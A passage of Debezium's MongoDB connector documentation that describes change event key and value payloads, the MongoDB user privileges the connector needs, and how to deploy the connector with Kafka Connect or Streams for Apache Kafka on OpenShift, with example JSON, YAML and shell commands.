The following table provides examples of how different types of `_id` fields are represented.\n\n.Examples of representing document `_id` fields in event key payloads\n[options=\"header\",role=\"code-wordbreak-col2 code-wordbreak-col3\"]\n|===\n|Type |MongoDB `_id` Value|Key's payload\n|Integer |1234|`{ \"id\" : \"1234\" }`\n|Float |12.34|`{ \"id\" : \"12.34\" }`\n|String |\"1234\"|`{ \"id\" : \"\\\"1234\\\"\" }`\n|Document|`{ \"hi\" : \"kafka\", \"nums\" : [10.0, 100.0, 1000.0] }`|`{ \"id\" : \"{\\\"hi\\\" : \\\"kafka\\\", \\\"nums\\\" : [10.0, 100.0, 1000.0]}\" }`\n|ObjectId |`ObjectId(\"596e275826f08b2730779e1f\")`|`{ \"id\" : \"{\\\"$oid\\\" : \\\"596e275826f08b2730779e1f\\\"}\" }`\n|Binary |`BinData(\"a2Fma2E=\",0)`|`{ \"id\" : \"{\\\"$binary\\\" : \\\"a2Fma2E=\\\", \\\"$type\\\" : \\\"00\\\"}\" }`\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-mongodb-change-events\n\/\/ Title: About values in {prodname} MongoDB change events\n[[mongodb-change-events-value]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample document that was used to show an example of a change event key:\n\n\n.Example document\n[source,json,indent=0]\n----\n {\n \"_id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n }\n----\n\nThe value portion of a change event for a change to this document is described for each event type:\n\n* <<mongodb-create-events,_create_ events>>\n* <<mongodb-update-events,_update_ events>>\n* <<mongodb-delete-events,_delete_ events>>\n* <<mongodb-tombstone-events,Tombstone events>>\n\n[id=\"mongodb-create-events\"]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` collection:\n\n[source,json,options=\"nowrap\",indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"name\": \"io.debezium.data.Json\", \/\/ <2>\n \"version\": 1,\n \"field\": \"after\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"name\": \"io.debezium.data.Json\",\n \"version\": 1,\n \"field\": \"patch\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"rs\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"collection\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ord\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"h\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.mongo.Source\", 
\/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"dbserver1.inventory.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"after\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"},\\\"first_name\\\" : \\\"Anne\\\",\\\"last_name\\\" : \\\"Kretchmar\\\",\\\"email\\\" : \\\"annek@noanswer.org\\\"}\", \/\/ <6>\n \"patch\": null,\n \"source\": { \/\/ <7>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 31,\n \"h\": 1546547425148721999\n },\n \"op\": \"c\", \/\/ <8>\n \"ts_ms\": 1558965515240 \/\/ <9>\n }\n }\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular collection.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`io.debezium.data.Json` is the schema for the payload's `after`, `patch`, and `filter` fields. This schema is specific to the `customers` collection. A _create_ event is the only kind of event that contains an `after` field. An _update_ event contains a `filter` field and a `patch` field. A _delete_ event contains a `filter` field, but not an `after` field nor a `patch` field.\n\n|3\n|`name`\na|`io.debezium.connector.mongo.Source` is the schema for the payload's `source` field. This schema is specific to the MongoDB connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`dbserver1.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `dbserver1` is the connector name, `inventory` is the database, and `customers` is the collection. This schema is specific to the collection.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the documents they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the xref:{link-avro-serialization}#avro-serialization[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`after`\n|An optional field that specifies the state of the document after the event occurred. In this example, the `after` field contains the values of the new document's `\\_id`, `first_name`, `last_name`, and `email` fields. The `after` value is always a string. By convention, it contains a JSON representation of the document. MongoDB's oplog entries contain the full state of a document only for _create_ events and also for `update` events, when the `capture.mode` option is set to `change_streams_update_full`; in other words, a _create_ event is the only kind of event that contains an _after_ field, when the `capture.mode` option is set either to `oplog` or `change_streams`.\n\n|7\n|`source`\na|Mandatory field that describes the source metadata for the event. 
This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contain the new document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifier of the MongoDB operation, which depends on the version of MongoDB. It is either the `h` field in the oplog event, or a field named `stxnid`, which represents the `lsid` and `txnNumber` fields from the oplog event (oplog capture mode only).\n* Unique identifiers of the MongoDB session `lsid` and transaction number `txnNumber` in case the change was executed inside a transaction (change streams capture mode only).\n\n|8\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a document. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|9\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[id=\"mongodb-update-events\"]\n=== _update_ events\n\n==== Oplog capture mode (legacy)\nThe value of a change event for an update in the sample `customers` collection has the same schema as a _create_ event for that collection. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. An _update_ event does not have an `after` value. Instead, it has these two fields:\n\n* `patch` is a string field that contains the JSON representation of the idempotent update operation\n\n* `filter` is a string field that contains the JSON representation of the selection criteria for the update. The `filter` string can include multiple shard key fields for sharded collections.\n\nHere is an example of a change event value in an event that the connector generates for an update in the `customers` collection:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... 
},\n \"payload\": {\n \"op\": \"u\", \/\/ <1>\n \"ts_ms\": 1465491461815, \/\/ <2>\n \"patch\": \"{\\\"$set\\\":{\\\"first_name\\\":\\\"Anne Marie\\\"}}\", \/\/ <3>\n \"filter\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"}}\", \/\/ <4>\n \"source\": { \/\/ <5>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 6,\n \"h\": 1546547425148721999\n }\n }\n }\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `u` indicates that the operation updated a document.\n\n|2\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|3\n|`patch`\n|Contains the JSON string representation of the actual MongoDB idempotent change to the document. In this example, the update changed the `first_name` field to a new value. +\n +\nAn _update_ event value does not contain an `after` field.\n\n|4\n|`filter`\n|Contains the JSON string representation of the MongoDB selection criteria that was used to identify the document to be updated.\n\n|5\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains the same information as a _create_ event for the same collection, but the values are different since this event is from a different position in the oplog. The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contain the updated document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifier of the MongoDB operation, which depends on the version of MongoDB. It is either the `h` field in the oplog event, or a field named `stxnid`, which represents the `lsid` and `txnNumber` fields from the oplog event.\n\n|===\n\n[WARNING]\n====\nIn a {prodname} change event, MongoDB provides the content of the `patch` field. The format of this field depends on the version of the MongoDB database. Consequently, be prepared for potential changes to the format when you upgrade to a newer MongoDB database version. Examples in this document were obtained from MongoDB 3.4, In your application, event formats might be different.\n====\n\n[NOTE]\n====\nIn MongoDB's oplog, _update_ events do not contain the _before_ or _after_ states of the changed document. Consequently, it is not possible for a {prodname} connector to provide this information. However, a {prodname} connector provides a document's starting state in _create_ and _read_ events. 
\n\n==== Change streams capture mode\nThe value of a change event for an update in the sample `customers` collection has the same schema as a _create_ event for that collection. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. An _update_ event has an `after` value only if the `capture.mode` option is set to `change_streams_update_full`. In this case, the event includes a new structured field, `updateDescription`, with these additional fields:\n\n* `updatedFields` is a string field that contains the JSON representation of the updated document fields with their values.\n\n* `removedFields` is a list of field names that were removed from the document.\n\n* `truncatedArrays` is a list of arrays in the document that were truncated.\n\nHere is an example of a change event value in an event that the connector generates for an update in the `customers` collection:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"op\": \"u\", \/\/ <1>\n \"ts_ms\": 1465491461815, \/\/ <2>\n \"after\":\"{\\\"_id\\\": {\\\"$numberLong\\\": \\\"1004\\\"},\\\"first_name\\\": \\\"Anne Marie\\\",\\\"last_name\\\": \\\"Kretchmar\\\",\\\"email\\\": \\\"annek@noanswer.org\\\"}\", \/\/ <3>\n \"updateDescription\": {\n \"removedFields\": null,\n \"updatedFields\": \"{\\\"first_name\\\": \\\"Anne Marie\\\"}\", \/\/ <4>\n \"truncatedArrays\": null\n },\n \"source\": { \/\/ <5>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 1,\n \"h\": null,\n \"tord\": null,\n \"stxnid\": null,\n \"lsid\":\"{\\\"id\\\": {\\\"$binary\\\": \\\"FA7YEzXgQXSX9OxmzllH2w==\\\",\\\"$type\\\": \\\"04\\\"},\\\"uid\\\": {\\\"$binary\\\": \\\"47DEQpj8HBSa+\/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=\\\",\\\"$type\\\": \\\"00\\\"}}\",\n \"txnNumber\":1\n }\n }\n }\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `u` indicates that the operation updated a document.\n\n|2\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|3\n|`after`\n|Contains the JSON string representation of the actual MongoDB document.\n +\nAn _update_ event value does not contain an `after` field if the capture mode is not set to `change_streams_update_full`.\n\n|4\n|`updatedFields`\n|Contains the JSON string representation of the updated field values of the document. In this example, the update changed the `first_name` field to a new value.\n\n|5\n|`source`\na|Mandatory field that describes the source metadata for the event. 
This field contains the same information as a _create_ event for the same collection, but the values are different since this event is from a different position in the oplog. The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contain the updated document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifiers of the MongoDB session `lsid` and transaction number `txnNumber` in case the change was executed inside a transaction.\n\n|===\n\n[WARNING]\n====\nThe `after` value in the event should be handled as the at-point-of-time value of the document.\nThe value is not calculated dynamically but is obtained from the collection.\nIt is thus possible, if multiple updates follow one another in close succession, that all _update_ events contain the same `after` value, representing the last value stored in the document.\n\nIf your application depends on gradual change evolution, rely on `updateDescription` only.\n====\n\n[id=\"mongodb-delete-events\"]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same collection. The `payload` portion in a _delete_ event contains values that are different from _create_ and _update_ events for the same collection. In particular, a _delete_ event contains neither an `after` value nor `patch` or `updateDescription` values. Here is an example of a _delete_ event for a document in the `customers` collection:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"op\": \"d\", \/\/ <1>\n \"ts_ms\": 1465495462115, \/\/ <2>\n \"filter\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"}}\", \/\/ <3>\n \"source\": { \/\/ <4>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": true,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 6,\n \"h\": 1546547425148721999\n }\n }\n }\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Field name |Description\n\n|1\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this document was deleted.\n\n|2\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|3\n|`filter`\n|Contains the JSON string representation of the MongoDB selection criteria that was used to identify the document to be deleted (oplog capture mode only).\n\n|4\n|`source`\na|Mandatory field that describes the source metadata for the event. 
This field contains the same information as a _create_ or _update_ event for the same collection, but the values are different since this event is from a different position in the oplog. The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contained the deleted document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifier of the MongoDB operation, which depends on the version of MongoDB. It is either the `h` field in the oplog event, or a field named `stxnid`, which represents the `lsid` and `txnNumber` fields from the oplog event (oplog capture mode only).\n* Unique identifiers of the MongoDB session `lsid` and transaction number `txnNumber` in case the change was executed inside a transaction (change streams capture mode only).\n\n|===\n\nMongoDB connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[id=\"mongodb-tombstone-events\"]\n=== Tombstone events\nAll MongoDB connector events for a uniquely identified document have exactly the same key. When a document is deleted, the _delete_ event value still works with log compaction because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that key, the message value must be `null`. To make this possible, after {prodname}\u2019s MongoDB connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value. A tombstone event informs Kafka that all messages with that same key can be removed.\n\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-mongodb-to-work-with-debezium\n\/\/ Title: Setting up MongoDB to work with a {prodname} connector\n[[setting-up-mongodb]]\n== Setting up MongoDB\n\nThe MongoDB connector uses MongoDB's oplog\/change streams to capture the changes, so the connector works only with MongoDB replica sets or with sharded clusters where each shard is a separate replica set.\nSee the MongoDB documentation for setting up a https:\/\/docs.mongodb.com\/manual\/replication\/[replica set] or https:\/\/docs.mongodb.com\/manual\/sharding\/[sharded cluster].\nAlso, be sure to understand how to enable https:\/\/docs.mongodb.com\/manual\/tutorial\/deploy-replica-set-with-keyfile-access-control\/#deploy-repl-set-with-auth[access control and authentication] with replica sets.\n\nYou must also have a MongoDB user that has the appropriate roles to read the `admin` database where the oplog can be read. 
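\n\nFor example, together with the additional privileges described in the next paragraph, such a user might be created as follows. This sketch is not part of {prodname}: the host, credentials, and role name are hypothetical, and the command shapes follow MongoDB's `createRole` and `createUser` role-management commands, so verify them against your MongoDB version:\n\n[source,python]\n----\nfrom pymongo import MongoClient\n\n# Hypothetical administrative connection; adjust host and credentials.\nclient = MongoClient(\"mongodb:\/\/admin:admin-secret@192.168.99.100:27017\/?authSource=admin\")\n\n# Custom role with the cluster-wide privilege actions the connector needs.\nclient.admin.command(\n    \"createRole\",\n    \"debeziumRole\",\n    privileges=[\n        {\"resource\": {\"cluster\": True}, \"actions\": [\"listDatabases\"]},\n        {\"resource\": {\"db\": \"\", \"collection\": \"\"}, \"actions\": [\"find\", \"changeStream\"]},\n    ],\n    roles=[],\n)\n\n# The connector user: read access to `admin` (oplog) and `config`\n# (sharded clusters), plus the custom role defined above.\nclient.admin.command(\n    \"createUser\",\n    \"debezium\",\n    pwd=\"dbz-secret\",\n    roles=[\n        {\"role\": \"read\", \"db\": \"admin\"},\n        {\"role\": \"read\", \"db\": \"config\"},\n        \"debeziumRole\",\n    ],\n)\n----\n\n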
Additionally, the user must be able to read the `config` database in the configuration server of a sharded cluster and must have the `listDatabases` privilege action.\nWhen change streams are used (the default), the user must also have the cluster-wide privilege actions `find` and `changeStream`.\n\nifdef::community[]\n[[mongodb-in-the-cloud]]\n=== MongoDB in the Cloud\n\nYou can use the {prodname} connector for MongoDB with https:\/\/www.mongodb.com\/atlas\/database[MongoDB Atlas].\nWhen connecting {prodname} to MongoDB Atlas, use one of the xref:mongodb-property-capture-mode[`capture modes`] that is based on change streams, rather than on the oplog.\nNote that MongoDB Atlas supports only secure connections via SSL, that is, the xref:mongodb-property-mongodb-ssl-enabled[`+mongodb.ssl.enabled+`] connector option _must_ be set to `true`.\nendif::community[]\n\n\/\/ Type: assembly\n\/\/ ModuleID: deployment-of-debezium-mongodb-connectors\n\/\/ Title: Deployment of {prodname} MongoDB connectors\n[[mongodb-deploying-a-connector]]\n== Deployment\n\nifdef::community[]\nTo deploy a {prodname} MongoDB connector, you install the {prodname} MongoDB connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect.\n\n.Prerequisites\n* link:https:\/\/zookeeper.apache.org\/[Apache Zookeeper], link:http:\/\/kafka.apache.org\/[Apache Kafka], and link:{link-kafka-docs}.html#connect[Kafka Connect] are installed.\n* MongoDB is installed and is xref:{link-mongodb-connector}#setting-up-mongodb[set up to work with the {prodname} connector].\n\n.Procedure\n. Download the\nifeval::['{page-version}' == 'master']\n{link-mongodb-plugin-snapshot}[connector's plug-in archive],\nendif::[]\nifeval::['{page-version}' != 'master']\nhttps:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-mongodb\/{debezium-version}\/debezium-connector-mongodb-{debezium-version}-plugin.tar.gz[connector's plug-in archive],\nendif::[]\n. Extract the JAR files into your Kafka Connect environment.\n. Add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`].\n. 
Restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Apache Zookeeper, Apache Kafka, and Kafka Connect with the MongoDB connector already installed and ready to run.\n\nYou can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\n\nThe {prodname} xref:tutorial.adoc[tutorial] walks you through using these images, and this is a great way to learn about {prodname}.\nendif::community[]\n\nifdef::product[]\nYou can use either of the following methods to deploy a {prodname} MongoDB connector:\n\n* xref:openshift-streams-mongodb-connector-deployment[Use {StreamsName} to automatically create an image that includes the connector plug-in].\n+\nThis is the preferred method.\n* xref:deploying-debezium-mongodb-connectors[Build a custom Kafka Connect container image from a Dockerfile].\n\n.Additional resources\n\n* xref:mongodb-connector-properties[]\n\n\/\/ Type: concept\n[id=\"openshift-streams-mongodb-connector-deployment\"]\n=== MongoDB connector deployment using {StreamsName}\n\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-streams-deployment.adoc[leveloffset=+1]\n\n\/\/ Type: procedure\n[id=\"using-streams-to-deploy-debezium-mongodb-connectors\"]\n=== Using {StreamsName} to deploy a {prodname} MongoDB connector\n\ninclude::{partialsdir}\/modules\/all-connectors\/proc-using-streams-to-deploy-a-debezium-connector.adoc[leveloffset=+1]\n\n\/\/ Type: procedure\n[id=\"deploying-debezium-mongodb-connectors\"]\n=== Deploying a {prodname} MongoDB connector by building a custom Kafka Connect container image from a Dockerfile\n\nTo deploy a {prodname} MongoDB connector, you must build a custom Kafka Connect container image that contains the {prodname} connector archive and then push this container image to a container registry.\nYou then create two custom resources (CRs):\n\n* A `KafkaConnect` CR that defines your Kafka Connect instance.\n The `image` property in the CR specifies the name of the container image that you create to run your {prodname} connector.\n You apply this CR to the OpenShift instance where link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat {StreamsName}] is deployed.\n {StreamsName} offers operators and images that bring Apache Kafka to OpenShift.\n\n* A `KafkaConnector` CR that defines your {prodname} MongoDB connector.\n Apply this CR to the same OpenShift instance where you apply the `KafkaConnect` CR.\n\n.Prerequisites\n\n* MongoDB is running and you completed the steps to {LinkDebeziumUserGuide}#setting-up-mongodb[set up MongoDB to work with a {prodname} connector].\n\n* {StreamsName} is deployed on OpenShift and is running Apache Kafka and Kafka Connect.\n For more information, see link:{LinkDeployStreamsOpenShift}[{NameDeployStreamsOpenShift}].\n\n* Podman or Docker is installed.\n\n* You have an account and permissions to create and manage containers in the container registry (such as `quay.io` or `docker.io`) to which you plan to add the container that will run your Debezium connector.\n\n.Procedure\n\n. Create the {prodname} MongoDB container for Kafka Connect:\n\n.. 
Create a Dockerfile that uses `{DockerKafkaConnect}` as the base image.\nFor example, from a terminal window, enter the following command:\n+\n[source,shell,subs=\"+attributes,+quotes\"]\n----\ncat <<EOF >debezium-container-for-mongodb.yaml \/\/ <1>\nFROM {DockerKafkaConnect}\nUSER root:root\nRUN mkdir -p \/opt\/kafka\/plugins\/debezium \/\/ <2>\nRUN curl -O {red-hat-maven-repository}debezium\/debezium-connector-{connector-file}\/{debezium-version}-redhat-__<build_number>__\/debezium-connector-{connector-file}-{debezium-version}-redhat-__<build_number>__-plugin.zip\nUSER 1001\nEOF\n----\n<1> You can specify any file name that you want.\n<2> Specifies the path to your Kafka Connect plug-ins directory. If your Kafka Connect plug-ins directory is in a different location, replace this path with the actual path of your directory.\n+\nThe command creates a Dockerfile with the name `debezium-container-for-mongodb.yaml` in the current directory.\n\n.. Build the container image from the `debezium-container-for-mongodb.yaml` Docker file that you created in the previous step.\nFrom the directory that contains the file, open a terminal window and enter one of the following commands:\n+\n[source,shell,options=\"nowrap\"]\n----\npodman build -t debezium-container-for-mongodb:latest .\n----\n+\n[source,shell,options=\"nowrap\"]\n----\ndocker build -t debezium-container-for-mongodb:latest .\n----\nThe preceding commands build a container image with the name `debezium-container-for-mongodb`.\n\n.. Push your custom image to a container registry, such as `quay.io` or an internal container registry.\nThe container registry must be available to the OpenShift instance where you want to deploy the image.\nEnter one of the following commands:\n+\n[source,shell,subs=\"+quotes\"]\n----\npodman push _<myregistry.io>_\/debezium-container-for-mongodb:latest\n----\n+\n[source,shell,subs=\"+quotes\"]\n----\ndocker push _<myregistry.io>_\/debezium-container-for-mongodb:latest\n----\n\n.. Create a new {prodname} MongoDB `KafkaConnect` custom resource (CR).\nFor example, create a `KafkaConnect` CR with the name `dbz-connect.yaml` that specifies `annotations` and `image` properties as shown in the following example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnect\nmetadata:\n name: my-connect-cluster\n annotations:\n strimzi.io\/use-connector-resources: \"true\" \/\/ <1>\nspec:\n #...\n image: debezium-container-for-mongodb \/\/ <2>\n----\n<1> `metadata.annotations` indicates to the Cluster Operator that `KafkaConnector` resources are used to configure connectors in this Kafka Connect cluster.\n<2> `spec.image` specifies the name of the image that you created to run your Debezium connector.\nThis property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator.\n\n.. Apply the `KafkaConnect` CR to the OpenShift Kafka Connect environment by entering the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc create -f dbz-connect.yaml\n----\n+\nThe command adds a Kafka Connect instance that specifies the name of the image that you created to run your {prodname} connector.\n\n. 
Create a `KafkaConnector` custom resource that configures your {prodname} MongoDB connector instance.\n+\nYou configure a {prodname} MongoDB connector in a `.yaml` file that specifies the configuration properties for the connector.\nThe connector configuration might instruct {prodname} to produce change events for a subset of MongoDB replica sets or sharded clusters.\nOptionally, you can set properties that filter out collections that are not needed.\n+\nThe following example configures a {prodname} connector that connects to a MongoDB replica set `rs0` at port `27017` on `192.168.99.100`,\nand captures changes that occur in the `inventory` collection.\n`fulfillment` is the logical name of the replica set.\n+\n.MongoDB `inventory-connector.yaml`\n[source,yaml,options=\"nowrap\",subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\n kind: KafkaConnector\n metadata:\n name: inventory-connector \/\/ <1>\n labels:\n strimzi.io\/cluster: my-connect-cluster\n spec:\n class: io.debezium.connector.mongodb.MongoDbConnector \/\/ <2>\n config:\n mongodb.hosts: rs0\/192.168.99.100:27017 \/\/ <3>\n mongodb.name: fulfillment \/\/ <4>\n collection.include.list: inventory[.]* \/\/ <5>\n----\n<1> The name that is used to register the connector with Kafka Connect.\n<2> The name of the MongoDB connector class.\n<3> The host addresses to use to connect to the MongoDB replica set.\n<4> The _logical name_ of the MongoDB replica set, which forms a namespace for generated events and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.\n<5> An optional list of regular expressions that match the collection namespaces (for example, <dbName>.<collectionName>) of all collections to be monitored.\n\n. 
Create your connector instance with Kafka Connect.\nFor example, if you saved your `KafkaConnector` resource in the `inventory-connector.yaml` file, you would run the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc apply -f inventory-connector.yaml\n----\n+\nThe preceding command registers `inventory-connector` and the connector starts to run against the `inventory` collection as defined in the `KafkaConnector` CR.\nendif::product[]\n\nifdef::community[]\n[[mongodb-example-configuration]]\n=== MongoDB connector configuration example\n\nThe following is an example of the configuration for a connector instance that captures data from a MongoDB replica set `rs0` at port 27017 on 192.168.99.100, which we logically name `fulfillment`.\nTypically, you configure the {prodname} MongoDB connector in a JSON file by setting the configuration properties that are available for the connector.\n\nYou can choose to produce events for a particular MongoDB replica set or sharded cluster.\nOptionally, you can filter out collections that are not needed.\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.mongodb.MongoDbConnector\", \/\/ <2>\n \"mongodb.hosts\": \"rs0\/192.168.99.100:27017\", \/\/ <3>\n \"mongodb.name\": \"fulfillment\", \/\/ <4>\n \"collection.include.list\": \"inventory[.]*\" \/\/ <5>\n }\n}\n----\n<1> The name of our connector when we register it with a Kafka Connect service.\n<2> The name of the MongoDB connector class.\n<3> The host addresses to use to connect to the MongoDB replica set.\n<4> The _logical name_ of the MongoDB replica set, which forms a namespace for generated events and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.\n<5> A list of regular expressions that match the collection namespaces (for example, <dbName>.<collectionName>) of all collections to be monitored. This is optional.\n\nendif::community[]\n\nFor the complete list of the 